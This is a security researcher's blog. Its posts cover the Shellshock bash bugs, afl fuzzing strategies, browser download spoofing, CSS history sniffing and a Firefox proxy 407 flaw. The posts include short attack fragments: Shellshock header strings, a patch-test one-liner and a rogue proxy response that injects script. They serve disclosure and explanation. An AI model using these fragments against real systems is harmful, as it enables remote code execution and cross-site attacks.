This is a personal blog. My other stuff: book | home page | Twitter | G+ | CNC robotics | electronics

September 27, 2014

Bash bug: apply Florian's patch now (CVE-2014-6277 and CVE-2014-6278)

OK, rebuild bash and deploy Florian's unofficial patch or its now-upstream version now. If you're a distro maintainer, please consider doing the same.

My previous post has more information about the original vulnerability (CVE-2014-6271). It also explains Tavis' and my original negative sentiment toward the original upstream patch. In short, the revised code did not stop bash from parsing the code seen in potentially attacker-controlled, remotely-originating environmental variables. Instead, the fix simply seeks to harden the parsing to prevent RCE. It relies on two risky assumptions:
  • That spare for this one bug we're fixing now, the process of parsing attacker-controlled functions is guaranteed to have no side effects on the subsequently executed trusted code.

  • That the underlying parser, despite probably not being designed to deal with attacker-supplied inputs, is free from the usual range of C language bugs.
From the very early hours, we have argued on the oss-security mailing list that a more reasonable approach would be to shield the parser from remotely-originating strings. I proposed putting the function export functionality behind a runtime flag or using a separate, prefixed namespace for the exported functions - so that variables such as HTTP_COOKIE do not go through this code path at all. Unfortunately, we made no real progress on that early in the game.

Soon thereafter, people started to bump into additional problems in the parser code. The first assumption behind the patch - the one about the parsing process not having other side effects - was quickly proved wrong by Tavis, who came up with a code construct that would get the parser in an inconsistent state, causing bash to create a bogus file and mangle any subsequent code that /bin/sh is supposed to execute.

This was assigned CVE-2014-7169 and led to a round of high-profile press reports claiming that we're still doomed, and people assigning the new bug CVSS scores all the way up to 11. The reality was a bit more nuanced: the glitch demonstrated by Tavis' code is a bit less concerning, because it does not translate into a universally exploitable RCE - at least not as far as we could figure it out. Some uses of /bin/sh would be at risk, but most would just break in a probably-non-exploitable way. The maintainer followed with another patch that locked down this specific hole.

The second assumption started showing cracks, too. First came a report from Todd Sabin, who identified an off-by-one error when parsing more than ten stacked redirects. The bug, assigned CVE-2014-7186, would cause a crash, but given the nature of the underlying assignment, it wasn't particularly clear if this created an immediately exploitable security risk. Another similarly ambiguous one-off issue with line counting in loops cropped up shortly thereafter (CVE-2014-7187).

The two latter issues do not have an officially released upstream patch at that point, but they prompted Florian Weimer of Red Hat to develop an unofficial patch that takes a seemingly more durable approach that we argued for earlier on: putting function exports in a separate namespace. Florian's fix effectively isolates the function parsing code from attacker-controlled strings in almost all the important use cases we can currently think of.

(One major outlier would be any solutions that rely on blacklisting environmental variables to run restricted shells or restricted commands as a privileged user - sudo-type stuff - but it's a much smaller attack surface and a a very dubious security boundary to begin with.)

Well... so, to get to the point: I've been fuzzing the underlying function parser on the side - and yesterday, bumped into a new parsing issue (CVE-2014-6277) that is almost certainly remotely exploitable and made easier to leverage due to the fact that bash is seldom compiled with ASLR. I'll share the technical details later on; for now, I sent the info to the maintainer of bash and to several key Linux distros. In general terms, it's an attempt to access uninitialized memory leading to reads from, and then subsequent writes to, a pointer that is fully within attacker's control. Here's a pretty telling crash: bash[3054]: segfault at 41414141 ip 00190d96 ... Soon after posting this entry, I also bumped in the sixth and most severe issue so far, essentially permitting very simple and straightforward remote code execution (CVE-2014-6278) on the systems that are patched against the first bug. It's a "put your commands here" type of a bug similar to the original report. I will post additional details in a couple of days to give people enough time to upgrade.

At this point, I very strongly recommend manually deploying Florian's patch unless your distro is already shipping it. (Florian's patch has been also finally included upstream shortly after I first posted this entry.)

From within the shell itself, the simplest way to check if you already have it installed would be: foo='() { echo not patched; }' bash -c foo If the command shows "not patched", you don't have the patch and you are still vulnerable to a (currently non-public) RCE, even if you applied the original one (or the subsequent upstream patch that addressed the issue found by Tavis).

Oh, and if it shows "command not found", you're good.

September 25, 2014

Quick notes about the bash bug, its impact, and the fixes so far

We spent a good chunk of the day investigating the now-famous bash bug (CVE-2014-6271), so I had no time to make too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise earlier in the day.

Let's start with the nature of the bug. At its core, the problem caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to children shells, similarly to how you can export normal environmental variables. The functionality in action looks like this: $ function foo { echo "hi mom"; } $ export -f foo $ bash -c 'foo' # Spawn nested shell, call 'foo' hi mom The behavior is implemented as a hack involving specially-formatted environmental variables: in essence, any variable starting with a literal "() {" will be dispatched to the parser just before executing the main program. You can see this in action here: $ foo='() { echo "hi mom"; }' bash -c 'foo' hi mom The concept of granting magical properties to certain values of environmental variables clashes with several ancient customs - most notably, with the tendency for web servers such as Apache to pass client-supplied strings in the environment to any subordinate binaries or scripts. Say, if I request a CGI or PHP script from your server, the env variables $HTTP_COOKIE and $HTTP_USER_AGENT will be probably initialized to the raw values seen in the original request. If the values happen to begin with "() {" and are ever seen by /bin/bash, events may end up taking an unusual turn.

And so, the bug we're dealing with stems from the observation that trying to parse function-like strings received in HTTP_* variables could have some unintended side effects in that shell - namely, it could easily lead to your server executing arbitrary commands trivially supplied in a HTTP header by random people on the Internet.

With that out of the way, it is important to note that the today's patch provided by the maintainer of bash does not stop the shell from trying to parse the code within headers that begin with "() {" - it merely tries to get rid of that particular RCE side effect, originally triggered by appending commands past the end of the actual function def. But even with all the current patches applied, you can still do this: Cookie: () { echo "Hello world"; } ...and witness a callable function dubbed HTTP_COOKIE() materialize in the context of subshells spawned by Apache; of course, the name will be always prefixed with HTTP_*, so it's unlikely to clash with anything or be called by incident - but intuitively, it's a pretty scary outcome.

In the same vein, doing this will also have an unexpected result: Cookie: () { oops If specified on a request to a bash-based CGI script, you will see a scary bash syntax error message in your error log.

All in all, the fix hinges on two risky assumptions:
  1. That the bash function parser invoked to deal with variable-originating function definitions is robust and does not suffer from the usual range of low-level C string parsing bugs that almost always haunt similar code - a topic that, when it comes to shells, hasn't been studied in much detail before now. (In fact, I am aware of a privately made now disclosed report of such errors in the parser - CVE-2014-7186 and CVE-2014-7187.)

    Update (Sep 26): I also bumped into what seems to be a separate and probably exploitable use of an uninitialized pointer in the parser code; shared the details privately upstream.
  2. That the parsing steps are guaranteed to have no global side effects within the child shell. As it happens, this assertion has been already proved wrong by Tavis (CVE-2014-7169); the side effect he found probably-maybe isn't devastating in the general use case (at least until the next stroke of brilliance), but it's certainly a good reason for concern.

    Update (Sep 27): Found a sixth and most severe issue that is essentially equivalent to the original RCE on all systems that only have the original, maintainer-provided patch.

Contrary to multiple high-profile reports, the original fix was not "broken" in the sense that there is no universal RCE exploit for it - but if I were a betting man, I would not bet on the patch holding up in the long haul (Update: as noted above, it did not hold up). A more reasonable solution would involve temporarily disabling function imports, putting them behind a runtime flag, or blacklisting some of the most dangerous variable patterns (e.g., HTTP_*); and later on, perhaps moving to a model where function exports use a distinct namespace while present in the environment.

What else? Oh, of course: the impact of this bug is an interesting story all in itself. At first sight, the potential for remote exploitation should be limited to CGI scripts that start with #!/bin/bash and to several other programs that explicitly request this particular shell. But there's a catch: on a good majority of modern Linux systems, /bin/sh is actually a symlink to /bin/bash!

This means that web apps written in languages such as PHP, Python, C++, or Java, are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'. There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter.

For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). A handful of MTAs, MUAs, or FTP server architectures may be also of concern - in particular, there are third-party reports of qmail installations being at risk. Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with.

Exposure on other fronts is possible, but probably won't be as severe. The worries around PHP and other web scripting languages, along with the concern for userspace DHCP, are the most significant reasons to upgrade - and perhaps to roll out more paranoid patches, rather than relying solely on the two official ones. On the upside, you don't have to worry about non-bash shells - and that covers a good chunk of embedded systems out there. In particular, contrary to several claims, Busybox should be fine.

Update (Sep 28): the previously-unofficial namespace isolation patch from Florian has eventually made it upstream. You should deploy that patch ASAP.

PS. As for the inevitable "why hasn't this been noticed for 15 years" / "I bet the NSA knew about it" stuff - my take is that it's a very unusual bug in a very obscure feature of a program that researchers don't really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.

September 02, 2014

CVE-2014-1564: Uninitialized memory with truncated images in Firefox

The recent release of Firefox 32 fixes another interesting image parsing issue found by american fuzzy lop: following a refactoring of memory management code, the past few versions of the browser ended up using uninitialized memory for certain types of truncated images, which is easily measurable with a simple <canvas> + toDataURL() harness that examines all the fuzzer-generated test cases.

In general, problems like that may leak secrets across web origins, or more prosaically, may help attackers bypass security measures such as ASLR. For a slightly more detailed discussion, check out this post.

Here's a short proof-of-concept that should work if you haven't updated to 32 yet: This is tracked as CVE-2014-1564, Mozilla bug 1045977. Several more should be coming soon.

Some notes on web tracking and related mechanisms

Artur Janc and I put together a nice, in-depth overview of all the known fingerprinting and tracking vectors that appear to be present in modern browsers. This is an interesting, polarizing, and poorly-studied area; my main hope is that the doc will bring some structure to the discussions of privacy consequences of existing and proposed web APIs - and help vendors and standards bodies think about potential solutions in a more holistic way.

That's it - carry on!

August 08, 2014

Binary fuzzing strategies: what works, what doesn't

Successful fuzzers live and die by their fuzzing strategies. If the changes made to the input file are too conservative, the fuzzer will achieve very limited coverage. If the tweaks are too aggressive, they will cause most inputs to fail parsing at a very early stage, wasting CPU cycles and spewing out messy test cases that are difficult to investigate and troubleshoot.

Designing the mutation engine for a new fuzzer has more to do with art than science. But one of the interesting side effects of the design of american fuzzy lop is that it provides a rare feedback loop: you can carefully measure what types of changes to the input file actually result in the discovery of new branches in the code, and which ones just waste your time or money.

This data is particularly easy to read because the fuzzer also approaches every new input file by going through a series of progressively more complex, but exhaustive and deterministic fuzzing strategies - say, sequential bit flips and simple arithmetics - before diving into purely random behaviors. The reason for this is the desire to generate the simplest and most elegant test cases first; but the design also provides a very good way to quantify how much value each new strategy brings in to the table - and whether we need it at all.

The measurements of afl fuzzing efficiency for reasonably-sized test cases are remarkably consistent across a variety of real-world binary formats - anything ranging from image files (JPEG, PNG, GIF, WebP) to archives (gzip, xz, tar) - and because of this, I figured that sharing the data more broadly will be useful to folks who are working on fuzzers of their own. So, let's dive in:
  • Walking bit flips: the first and most rudimentary strategy employed by afl involves performing sequential, ordered bit flips. The stepover is always one bit; the number of bits flipped in a row varies from one to four. Across a large and diverse corpus of input files, the observed yields are:

    • Flipping a single bit: ~70 new paths per one million generated inputs,
    • Flipping two bits in a row: ~20 additional paths per million generated inputs,
    • Flipping four bits in a row: ~10 additional paths per million inputs.

    (Note that the counts for every subsequent pass include only the paths that could not have been discovered by the preceding strategy.)

    Of course, the strategy is relatively expensive, with each pass requiring eight execve() per every byte of the input file. With the returns are diminishing rapidly, afl stops after these three passes - and switches to a second, less expensive strategy past that point.

  • Walking byte flips: a natural extension of walking bit flip approach, this method relies on 8-, 16-, or 32-bit wide bitflips with a constant stepover of one byte. This strategy discovers around ~30 additional paths per million inputs, on top of what could have been triggered with shorter bit flips.

    It should be fairly obvious that each pass takes approximately one execve() call per one byte of the input file, making it surprisingly cheap, but also limiting its potential yields in absolute terms.

  • Simple arithmetics: to trigger more complex conditions in a deterministic fashion, the third stage employed by afl attempts to subtly increment or decrement existing integer values in the input file; this is done with a stepover of one byte. The experimentally chosen range for the operation is -35 to +35; past these bounds, fuzzing yields drop dramatically. In particular, the popular option of sequentially trying every single value for each byte (equivalent to arithmetics in the range of -128 to +127) helps very little and is skipped by afl.

    When it comes to the implementation, the stage consists of three separate operations. First, the fuzzer attempts to perform subtraction and addition on individual bytes. With this out of the way, the second pass involves looking at 16-bit values, using both endians - but incrementing or decrementing them only if the operation would have also affected the most significant byte (otherwise, the operation would simply duplicate the results of the 8-bit pass). The final stage follows the same logic, but for 32-bit integers.

    The yields for this method vary depending on the format - ranging from ~2 additional paths per million in JPEG to ~8 per million in xz. The cost is relatively high, averaging around 20 execve() calls per one byte of the input file - but can be significantly improved with only a modest impact on path coverage by sticking to +/- 16.

  • Known integers: the last deterministic approach employed by afl relies on a hardcoded set of integers chosen for their demonstrably elevated likelihood of triggering edge conditions in typical code (e.g., -1, 256, 1024, MAX_INT-1, MAX_INT). The fuzzer uses a stepover of one byte to sequentially overwrite existing data in the input file with one of the approximately two dozen "interesting" values, using both endians (the writes are 8-, 16-, and 32-bit wide).

    The yields for this stage are between 2 and 5 additional paths per one million tries; the average cost is roughly 30 execve() calls per one byte of input file.

  • Stacked tweaks: with deterministic strategies exhausted for a particular input file, the fuzzer continues with a never-ending loop of randomized operations that consist of a stacked sequence of:

    • Single-bit flips,
    • Attempts to set "interesting" bytes, words, or dwords (both endians),
    • Addition or subtraction of small integers to bytes, words, or dwords (both endians),
    • Completely random single-byte sets,
    • Block deletion,
    • Block duplication via overwrite or insertion,
    • Block memset.

    Based on a fair amount of testing, the optimal execution path yields appear to be achieved when the probability of each operation is roughly the same; the number of stacked operations is chosen as a power-of-two between 1 and 64; and the block size for block operations is capped at around 1 kB.

    The absolute yield for this stage is typically comparable or higher than the total number of execution paths discovered by all deterministic stages earlier on.

  • Test case splicing: this is a last-resort strategy that involves taking two distinct input files from the queue that differ in at least two locations; and splicing them at a random location in the middle before sending this transient input file through a short run of the "stacked tweaks" algorithm. This strategy usually discovers around 20% additional execution paths that are unlikely to trigger using the previous operation alone.

    (Of course, this method requires a good, varied corpus of input files to begin with; afl generates one automatically, but for other tools, you may have to construct it manually.)

As you can see, deterministic block operations (duplication, splicing) are not attempted in an exhaustive fashion; this is because they generally require quadratic time (or worse) - so while their yields may be good for very short inputs, they degrade very quickly.

Well, that's it! If you ever decide to try out afl, you can watch these and other cool stats on your screen in real time.

August 04, 2014

A bit more about american fuzzy lop

Fuzzing is one of the most powerful strategies for identifying security issues in real-world software. Unfortunately, it also offers fairly shallow coverage: it is impractical to exhaustively cycle through all possible inputs, so even something as simple as setting three separate bytes to a specific value to reach a chunk of unsafe code can be an insurmountable obstacle to a typical fuzzer.

There have been numerous attempts to solve this problem by augmenting the process with additional information about the behavior of the tested code. These techniques can be divided into three broad groups:
  • Simple coverage maximization. This approach boils down to trying to isolate initial test cases that offer diverse code coverage in the targeted application - and them fuzzing them using conventional techniques.

  • Control flow analysis. A more sophisticated technique that leverages instrumented binaries to focus the fuzzing efforts on mutations that generate distinctive sequences of conditional branches within the instrumented binary.

  • Static analysis. An approach that attempts to reason about potentially interesting states within the tested program and then make educated guesses about the input values that could possibly trigger them.
The first technique is surprisingly powerful when used to pre-select initial test cases from a massive corpus of valid data - say, the result of a large-scale web crawl. Unfortunately, coverage measurements provide only a very simplistic view of the internal state of the program, making them less suited for creatively guiding the fuzzing process later on.

The latter two techniques are extremely promising in experimental settings. That said, in real-world applications, they are not only very slow, but frequently lead to irreducible complexity: most of the high-value targets will have a vast number of internal states and possible execution paths, and deciding which ones are interesting and substantially different from the rest is an extremely difficult challenge that, if not solved, usually causes the "smart" fuzzer to perform no better than a traditional one.

American fuzzy lop tries to find a reasonable middle ground between sophistication and practical utility. In essence, it's a fuzzer that relies on a form of Markov chains to detect subtle, local-scale changes to program control flow without having to perform complex global-scale comparisons between series of long and winding execution traces - a common failure point for similar tools.

In almost-plain English, the fuzzer does this by instrumenting every effective line of C or C++ code (or any other GCC-supported language) to record a tuple in the following format:

[ID of current code location], [ID of previously-executed code location]

The ordering information for tuples is discarded; the primary signal used by the fuzzer is the appearance of a previously-unseen tuple in the output dataset; this is also coupled with coarse magnitude count for tuple hit rate. This method combines the self-limiting nature of simple coverage measurements with the sensitivity of control flow analysis. It detects both explicit conditional branches, and indirect variations in the behavior of the tested app.

The output from this instrumentation is used as a part of a simple, vaguely "genetic" algorithm:
  1. Load user-supplied initial test cases into the queue,

  2. Take input file from the queue,

  3. Repeatedly mutate the file using a balanced variety of traditional fuzzing strategies (see later),

  4. If any of the generated mutations resulted in a new tuple being recorded by the instrumentation, add mutated output as a new entry in the queue.

  5. Go to 2.
The discovered test cases are also periodically culled to eliminate ones that have been made obsolete by more inclusive finds discovered later in the fuzzing process. Because of this, the fuzzer is useful not only for identifying crashes, but is exceptionally effective at turning a single valid input file into a reasonably-sized corpus of interesting test cases that can be manually investigated for non-crashing problems, handed over to valgrind, or used to stress-test applications that are harder to instrument or too slow to fuzz efficiently. In particular, it can be extremely useful for generating small test sets that may be programatically or manually examined for anomalies in a browser environment.

(For a quick partial demo, click here.)

Of course, there are countless "smart" fuzzer designs that look good on paper, but fail in real-world applications. I tried to make sure that this is not the case here: for example, afl can easily tackle security-relevant and tough targets such as gzip, xz, lzo, libjpeg, libpng, giflib, libtiff, or webp - all with absolutely no fine-tuning and while running at blazing speeds. The control flow information is also extremely useful for accurately de-duping crashes, so the tool does that for you.

In fact, I spent some time running it on a single machine against libjpeg, giflib, and libpng - some of the most robust best-tested image parsing libraries out there. So far, the tool found:
  • CVE-2013-6629: JPEG SOS component uninitialized memory disclosure in jpeg6b and libjpeg-turbo,

  • CVE-2013-6630: JPEG DHT uninitialized memory disclosure in libjpeg-turbo,

  • MSRC 0380191: A separate JPEG DHT uninitialized memory disclosure in Internet Explorer (pending with vendor),

  • CVE-2014-1564: Uninitialized memory disclosure via GIF images in Firefox,

  • Mozilla bug #1063733: Another uninitialized memory disclosure in Firefox (pending with vendor),

  • Chromium bug #398235, Mozilla bug #1050342: Probable library-related JPEG security issues in Chrome and Firefox (pending),

  • PNG zlib API misuse bug in MSIE (DoS-only),

  • Several browser-crashing images in WebKit browsers (DoS-only).
More is probably to come. In other words, you should probably try it out. The most significant limitation today is that the current fuzzing strategies are optimized for binary files; the fuzzer does:
  • Walking bitflips - 1, 2, and 4 bits,

  • Walking byte flips - 1, 2, and 4 bytes,

  • Walking addition and subtraction of small integers - byte, word, dword (both endians),

  • Walking insertion of interesting integers (-1, MAX_INT, etc) - byte, word, dword (both endians),

  • Random stacked flips, arithmetics, block cloning, insertion, deletion, etc,

  • Random splicing of synthetized test cases - pretty unique!
All these strategies have been specifically selected for an optimal balance between fuzzing cost and yields measured in terms of the number of discovered execution paths with binary formats; for highly-redundant text-based formats such as HTML or XML, syntax-aware strategies (template- or ABNF-based) will obviously yield better results. Plugging them into AFL would not be hard, but requires work.

June 22, 2014

Boolean algebra with CSS (when you can only set colors)

Depending on how you look at it, CSS can be considered Turing-complete. But in one privacy-relevant setting - when styling :visited links - the set of CSS directives you can use is extremely limited, effectively letting you control not much more than the color of the text nested between <a href=...> and </a>. Can you perform any computations with that?

Well, as it turns out, you can - in a way. Check out this short write-up for a discussion on how to implement Boolean algebra by exploiting an interesting implementation-level artifact of CSS blending to steal your browsing history a bit more efficiently than before.

Vulnerability logo and vanity domain forthcoming - stay tuned.

March 20, 2014

Messing around with <a download>

Not long ago, the HTML5 specification has extended the semantics for <a href=...> links by adding the download attribute. In a nutshell, the markup allows you to specify that an outgoing link should be always treated as a download, even if the hosting site does not serve the file with Content-Disposition: attachment:

<a href="" download>What a cute kitty!</a>

I am unconvinced that this feature scratches any real itch for HTTP links, but it's already supported in Firefox, Chrome, and Opera.

Of course, there are some kinks: in absence of the Content-Disposition header, the browser needs to figure out the correct file name for the download. In practice, this is always done based on the path seen in the URL. That's not great, because a good majority of web frameworks will tolerate trailing garbage in the path segment; indeed, so does Let's try it out:

<a href="" download>What a cute kitty!</a>

But we shouldn't dwell on this, because the download syntax makes it easy for the originating page to simply override that logic and pick any file name and extension it likes:

<a href="" download="KittyViewer.exe">What a cute kitty!</a>

That's odd - and keep in mind that the image we are seeing is at least partly user-controlled. A location like this can be found on any major destination on the Internet: if not an image, you can always find a JSON API or a HTML page that echoes something back.

It also helps to remember that it's usually pretty trivial to build files that are semantically valid to more than one parser, and have a different meaning to each one of them. Let's put it all together for a trivial PoC:

<a href=""
  download="AltavistaToolbar.bat">Download Bing toolbar from</a>

That's pretty creepy: if you download the file on Windows and click "open", the payload will execute and invoke notepad.exe. Still, is it a security bug? Well... the answer to that is not very clear.

For one, there is a temptation to trust the tooltip you see when you hover over a download link. But if you do that, you are in serious trouble, even in absence of that whole download bit: JavaScript code can intercept the onclick event and take you somewhere else. Luckily, most browsers provide you with a real security indicator later on: the download UI in Internet Explorer, Firefox, and Safari prominently shows the origin from which the document is being retrieved. And that's where the problem becomes fairly evident: never really meant to serve you with an attacker-controlled AltavistaToolbar.bat, but the browser says otherwise.

The story gets even more complicated when you consider that some browsers don't show the origin of the download in the UI at all; this is the case for Chrome and Opera. In such a design, you simply have to put all your faith in the origin from which you initiated the download. In principle, it's not a completely unreasonable notion, although I am not sure it aligns with user expectations particularly well. Sadly, there are other idiosyncrasies of the browser environment that mean the download you are seeing on a trusted page might have been initiated from another, unrelated document. Oops.

So, yes, browsers are messy. Over the past few years, I have repeatedly argued against <a download> on the standards mailing lists (most recently in 2013), simply because I think that nothing good comes out of suddenly taking the control over how documents are interpreted by the browser away from the hosting site. I don't think that my arguments were particularly persuasive, in part because nobody seemed to have a clear vision for the overall trust model around downloads on the Web.

PS. Interestingly, Firefox decided against the added exposure and implemented the semantics in a constrained way: the download attribute is honored only if the final download location is same-origin with the referring URL.

November 12, 2013

american fuzzy lop

Well, it's been a while, but I'm happy to announce a new fuzzing tool, aptly named american fuzzy lop: In essence, it's a practical (!) fuzzer for binary data formats that achieves great coverage and automatically synthesizes unique and interesting test cases based on a much smaller set of input files.

For an example of a bug found with afl, check out this advisory. Peace out.

May 04, 2013

And on a completely unrelated note...

...I think it's hilarious to mix several completely unrelated interests that appeal to very disjoint audiences on a single blog, so here is another article that I have recently written for MAKE: "Resin Casting: Going from CAD to Engineering-Grade Parts".

In my earlier article written for their blog, I expressed an opinion that some of the most pervasive barriers to home manufacturing do not lie with the availability of cutting-edge tools - but rather, with a very limited awareness of the well-established design and manufacturing processes that lead to durable, aesthetic, and functional parts.

The new article sheds some light on one of the best ways to progress from CNC-machined or 3D-printed shapes to components that match or outperform high-end injection-molded prototypes. In the extremely unlikely case that this is of any interest to you - enjoy!

Some harmless, old-fashioned fun with CSS

Several years ago, the CSS :visited pseudo-selector caused a bit of a ruckus: a malicious web page could display a large set of links to assorted destinations on the Internet, and then peek at how they were rendered to get a snapshot of your browsing history.

Several browser vendors addressed this problem by severely constraining the styling available from within the :visited selector, essentially letting you specify text color and not much more. They also limited the visibility of the styled attributes through APIs such as window.getComputedStyle(). This fix still permitted your browsing history to be examined through mechanisms such as cache timing or the detection of 40x responses for authentication-requiring scripts and images from a variety of websites. Nevertheless, it significantly limited the scale of the probing you could perform in a reliable and non-disruptive way.

Of course, many researchers have pointed out the obvious: that if you can convince the user to interact with your website, you can probably tell what color he is seeing without asking directly. A couple of extremely low-throughput attacks along these lines have been demonstrated in the past - for example, the CAPTCHA trick proposed by Collin Jackson.

So, my belated entry for this contest is this JavaScript clone of "Asteroids". It has a couple of interesting properties:
  • It's not particularly outlandish or constrained - at least compared to the earlier PoCs with CAPTCHAs or chess boards.

  • It collects information without breaking immersion. This is done by alternating between "real" and "probe" asteroids. The real ones are always visible and are targeted at the spaceship; if you don't take them down, the game ends. The "probe" asteroids, which may or may not be visible to the user depending on browsing history, seem as if they are headed for the spaceship, too - but if not intercepted, they miss it by a whisker.

  • It is remarkably high-bandwidth. Although the PoC tests only a handful of sites, it's possible to test hundreds of URLs in parallel by generating a very high number of "probe" asteroids at once. A typical user visits only a relatively small and uniformly distributed number of websites from any sufficiently large data set, so only a tiny fraction of probes would be visible on the screen. In fact, the testing could be easily rate-limited based on how frantic user's mouse movements have been in the past second or so.

  • It's pretty reliable due to the built-in "corrective mechanisms" for poor players.

February 20, 2013

Firefox: HTTPS and response code 407

Today's release of Firefox 19.0 fixes an interesting bug that I reported to the vendor back in October 2012. In essence, an attacker on an untrusted network could first coerce the browser to use a rogue HTTP proxy (this can be done by leveraging the WPAD protocol); wait until the browser attempts to download a HTTPS document from an interesting site through said proxy; and then selectively respond to the appropriate CONNECT request with a plain-text message such as this: HTTP/1.0 407 Boink Proxy-Authenticate: basic Connection: close Content-Type: text/html <html> <h1>Hi, mom!</h1> <script>alert(location.href)</script> [...additional padding follows...] The browser would show the user a cryptic authentication prompt - but hitting ESC or pressing cancel would inevitably result in the proxy-supplied plain-text document being rendered in the same-origin context of the requested HTTPS site. There goes the transport security - so I guess that's an oops?:-)

February 14, 2013

Boring non-security updates strike again!

My next book is coming out probably by the end of the year, and the remaining three readers should not be expecting frequent updates to this blog until then :-) Nevertheless, here are several tidbits not related to security in any way: If this sort of stuff floats your boat, you may also want to follow me on G+. In a couple of weeks, I should have several interesting browser bugs to share. Until then, carry on!

November 16, 2012

Lessons in history

Good news - I'm working on another book!

In the meantime, here's an interesting and forgotten page from the history of JavaScript that I stumbled upon thanks to Tavis. It's a long read, edited a bit for clarity; it's also fascinating account of how close we came to replacing the same-origin policy - its faults notwithstanding - with something much worse than that:

"The security model adopted by Navigator 2.0 and 3.0 is functional, but suffers from a number of problems. The [same-origin policy] that prevents one script from reading the contents of a window from another server is a particularly draconian example. This [policy] means that I cannot write a [web-based debugger] and post it on my web site for other developers to use [in] their own JavaScript. [Similarly, it] prevents the creation of JavaScript programs that crawl the Web, recursively following links from a given starting page."

"Because of the problems with [the same-origin policy], and with the theoretical underpinnings of [this class of security mechanisms], the developers at Netscape have created an entirely new security model. This new model is experimental in Navigator 3.0, and may be enabled by the end user through a procedure outlined later in this section. The new security model is theoretically much stronger, and should be a big advance for JavaScript security if it is enabled by default in Navigator 4.0."

"[Let's consider] the security problem we are worried about in the first place. For the most part, the problem is that private data may be sent across the Web by malicious JavaScript programs. The [SOP approach] patches this problem by preventing JavaScript programs from accessing private data. Unfortunately, this approach rules out non-malicious JavaScript [code that wants to use this data] without exporting it."

"Instead of preventing scripts from reading private data, a better approach would be to prevent them from exporting it, since this is what we are trying to [achieve] in the first place. If we could do this, then we could lift most of the [restrictions] that were detailed in the sections above."

"This is where the concept of data tainting comes in. The idea is that all JavaScript data values are given a flag. This flag indicates if the value is "tainted" (private) or not. [Tainted values will be prevented] from being exported to a server that does not already "own" it. [...] Whenever an attempt to export data violates the tainting rules, the user will be prompted with a dialog box asking them whether the export should be allowed. If they so choose, they can allow the export."

Of course, tainting would not have prevented malicious JavaScript from relaying the observations about the tainted data to parties unknown.

June 08, 2012

This page is now certified

Oh, you're welcome.

(Yeah, I made these.)

May 30, 2012

Yes, you can have fun with downloads

It is an important and little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs; in more limited circumstances, even individual frames can be targeted. I discuss the consequences of this behavior in The Tangled Web - and several months ago, I shared this amusing proof-of-concept illustrating the perils of this logic: Today, I wanted to showcase a more sneaky consequence of this design - and depending on who you ask, one that is possibly easier to prevent.

What's the issue, then? Well, it's pretty funny: predictably but not very intuitively, the attacker may initiate such cross-domain navigation not only to point the targeted window to a well-formed HTML document - but also to a resource served with the Content-Disposition: attachment header. In this scenario, the address bar of the targeted window will not be updated at all - but a rogue download prompt will appear on the screen, attached to the targeted document.

Here's an example of how this looks in Chrome; the fake flash11_updater.exe download supposedly served from is, in reality, supplied by the attacker:

All the top three browsers are currently vulnerable to this attack; some provide weak cues about the origin of the download, but in all cases, the prompt is attached to the wrong window - and the indicators seem completely inadequate.

You can check out the demo here:

The problem also poses an interesting challenge to sites that frame gadgets, games, or advertisements from third-party sources; even HTML5 sandboxed frames permit the initiation of rogue downloads (oops!).

Vendor responses, for the sake of posterity:

  • Chrome: reported March 30 (bug 121259). Fix planned, but no specific date set.

  • Internet Explorer: reported April 1 (case 12372gd). The vendor will not address the issue with a security patch for any current version of MSIE.

  • Firefox: reported March 30 (bug 741050). No commitment to fix at this point.
I think these responses are fine, given the sorry state of browser UI security in general; although in good conscience, I can't dismiss the problem as completely insignificant.

April 09, 2012

Well, I'm in a bit of a pickle...

I can't yet publish an interesting bug I hoped to share; I also don't want to rehash my earlier points about vulnerability trade, even as the debate has flared up again, thanks to the unfashionably late attention from Forbes and EFF.

So what I wanted to do instead is, once again, annoy the few remaining readers with my hobbyist work. Specifically, I wanted to showcase three things:

  • Omnibot, an interesting robot with a reconfigurable drivetrain,
  • Cycloidal drive, a mini-project to make an unorthodox type of transmission,
  • Adventures in CNC, my semi-humorous summary of my experiences with home manufacturing.
Sorry about that, and may the fortune be with you from now on!

February 12, 2012

It's this time of the year again

Yeah, welcome to the 2012 edition of the full disclosure debate!

As usual, there are reasonable people who disagree about the merits of non-coordinated disclosure; a more recent trend is to debate the value of developing and publishing exploits, even for already patched bugs. The short-term risks are pretty clear to any sensible person: there is robust data to show that the availability of functioning exploits drives a good chunk of low-tier, large-scale attacks.

The long-term benefits are more speculative. I like to think of it as a necessary evil: non-disclosure does not prevent sophisticated and resourceful attackers from developing their own exploits and going after high-value targets, but it quickly leads to complacency when it comes to fixing the underlying problems and monitoring your infrastructure. We would not have Windows Update, silent autoupdates in Chrome, or MacOS X ASLR improvements weren't it for the constant stream of public exploits and the accompanying attacks.

The cost-benefit calculation here is mostly a matter of personal taste, and we won't be able to settle it any time soon. I'm a bit on the fence, too: I am at best ambivalent about the merits of exploit packs and frameworks such as CORE Impact or Metasploit. I am also deeply uncomfortable with exploit trading, a trend all-too-eagerly embraced and supported by the industry.

But the merits of the debate aside, there is a disturbing propensity for parties who struggled with security response, and have sometimes adopted openly hostile tactics to suppress security research, to be on the front lines of the anti-disclosure movement. This is why I couldn't help but find parallels between Brad Arkin's recent statements, and a position taken ten years ago by Scott Culp. Brad says:

"My goal isn't to find and fix every security bug. I'd like to drive up the cost of writing exploits. But when researchers go public with techniques and tools to defeat mitigations, they lower that cost. [...] Too much attention is being paid these days to responding to vulnerability reports instead of focusing on blocking live exploits."

"[We need to] work closer with the research community to curb the publication of information that can help malicious hackers. [...] Something hard becomes very very easy. These exploits and techniques are copied, adapted and modified very cheaply."

